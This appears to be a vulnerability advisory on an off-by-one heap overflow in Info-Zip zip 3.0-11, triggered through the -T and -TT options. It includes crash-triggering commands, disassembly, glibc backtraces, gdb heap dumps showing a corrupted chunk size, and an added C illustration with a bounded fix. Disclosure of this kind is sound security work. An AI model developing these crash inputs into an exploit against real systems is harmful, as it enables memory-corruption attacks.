Info-Zip Zip 3.0-11 Crash

Info-Zip's zip binary, version 3.0-11, may suffer from an off-by-one vulnerability.


MD5 | 6139519aad8232ae7c1faab25f613857

Hello,

I found a crash in info-zip's zip command.
This vulnerability is caused by an off-by-one.
I don't use a malformed file for the crash, just the command.

And if the 'zip' binary is added to a function, it can be an exploitable vulnerability, I think.

[ Environment ]

OS : Ubuntu 16.04.3 LTS
Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
info-zip zip : 3.0-11

[ Condition ]

* Triggered with the options -T and -TT.
* The vulnerability is an off-by-one.
: With -T, zip runs a Linux command to test the archive; -TT supplies that command.
: Before calling system(), zip stores the command to execute in a heap buffer. The buffer size and its contents for three argument lengths are:
: 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip'
: 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: In each case the allocation equals the length of the -TT argument plus the length of 'flagT.zip' plus 3 (12 + 9 + 3 = 0x18, and so on), while the stored string (argument, space, opening quote, name, closing quote, terminating NUL) needs one byte more.
: The off-by-one happens when this command string is stored in the heap.
: It happens in the code below: the 16-bit store writes the closing quote (0x27) and the terminating NUL in one instruction, and the NUL lands one byte past the allocation.
Disassembly -
.text:000000000040A052 mov rax, [rsp+48h+var_40]
.text:000000000040A057 mov word ptr [r15+rax+2], 27h
Hex-Rays -
*(_WORD *)&v7[v16 + 2] = 0x27;
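The arithmetic behind this, as an added C illustration that is not zip's code: the allocation formula (argument length + archive-name length + 3) is inferred from the 0x18/0x38/0x58 figures above rather than quoted from the source, the rounding models x86_64 glibc malloc with 16-byte alignment, and the bounded snprintf builder is what a fix would look like. It also shows why the stray NUL only reaches the next chunk's size field for certain argument lengths, which is why the 11-'A' run in the 'Not Crash' dump of the Debugging section survives while 12 'A's crash.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bytes the built test command occupies: <-TT arg> + " '" + <archive> + "'" + NUL. */
static size_t cmd_bytes_written(const char *tt_arg, const char *zipname)
{
    return strlen(tt_arg) + 2 + strlen(zipname) + 1 + 1;
}

/* Allocation inferred from the report's 0x18/0x38/0x58 figures: arg + name + 3 (assumed). */
static size_t alloc_bytes_buggy(const char *tt_arg, const char *zipname)
{
    return strlen(tt_arg) + strlen(zipname) + 3;
}

/* Usable bytes of an in-use glibc chunk on x86_64: request + 8 rounded up to 16, min 32, minus 8. */
static size_t glibc_usable_bytes(size_t request)
{
    size_t chunk = (request + 8 + 15) & ~(size_t)15;
    return (chunk < 32 ? 32 : chunk) - 8;
}

/* The 1-byte overrun hits the next chunk's size field only when rounding leaves no slack. */
static int clobbers_next_chunk(const char *tt_arg, const char *zipname)
{
    return cmd_bytes_written(tt_arg, zipname) >
           glibc_usable_bytes(alloc_bytes_buggy(tt_arg, zipname));
}

/* Hardened builder: size from the format itself, bounded write; caller frees, NULL on failure. */
static char *build_test_cmd(const char *tt_arg, const char *zipname)
{
    int n = snprintf(NULL, 0, "%s '%s'", tt_arg, zipname);
    char *cmd = n < 0 ? NULL : malloc((size_t)n + 1);
    if (cmd && snprintf(cmd, (size_t)n + 1, "%s '%s'", tt_arg, zipname) != n) {
        free(cmd);
        cmd = NULL;
    }
    return cmd;
}

int main(void)
{
    const char *a12 = "AAAAAAAAAAAA", *zip = "flagT.zip";   /* the report's first case */
    printf("alloc %zu, written %zu, clobbers next size field: %d\n", alloc_bytes_buggy(a12, zip),
           cmd_bytes_written(a12, zip), clobbers_next_chunk(a12, zip));
    return 0;
}
```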


[ Error Msg ]

CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA' <- process dies
sh: 1: AAAAAAAAAAAA: not found
*** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]


zip error: Interrupted (aborting)
*** Error in `zip': free(): invalid pointer: 0x00000000009ef370 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x40873e]
zip[0x4090cb]
zip[0x409279]
/lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0]
/lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428]
/lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a]
/lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]


CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' <- process does not die

sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAA: not found
*** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913]
/lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5]
/lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241]
/lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9]
zip[0x40a0a4]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830]
zip[0x408529]


zip error: Interrupted (aborting)


[ Debugging ]
set follow-fork-mode parent
b*0x0000000000409F13
b*0x0000000000409E11
r flagT.zip -T -TT 'AAAAAAAAAAAA'

* Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA'
: this case mallocs 0x18 bytes.
: so the next chunk's size field is overwritten with a null byte (off by one).
# Not Crash
pwndbg> x/32gx 0x67f340
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x616c662720414141
0x67f360: 0x002770697a2e5467 0x00000000000000c1 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78

# Crash
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x6c66272041414141
0x67f360: 0x2770697a2e546761 0x0000000000000000 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78

* Case 2 : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
# crash
: before __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x6c66272041414141
0x67f190: 0x2770697a2e546761 0x0000000000000100 <- off by one
^ prev_size (first qword at 0x67f190 is the next chunk's prev_size; the second is its clobbered size field)

# not crash
: before __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x00000000000001f1

: after __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000251
0x67f160: 0x00007ffff7bc1db8 0x00007ffff7bc1db8
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x0000000000000211
